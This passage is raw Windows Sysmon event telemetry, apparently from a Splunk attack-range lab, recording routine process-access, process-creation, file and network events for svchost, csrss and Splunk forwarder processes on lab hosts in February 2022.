Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1493-6216-B604-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.222{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1493-6216-B604-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:47.223{4F8D34B0-1493-6216-B604-000000003902}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:48.254{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26D2BC8B188F72C4F3FEF9845A65D95A,SHA256=2BF8DC8F2A68ACB9B78F56044496CEACBE5F21F632743461F09DF7DAC0878615,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:48.128{4F8D34B0-1493-6216-B704-000000003902}22843464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000218994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:45.748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51493-false10.0.1.12-8089- 10341000x8000000000000000294784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:48.095{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 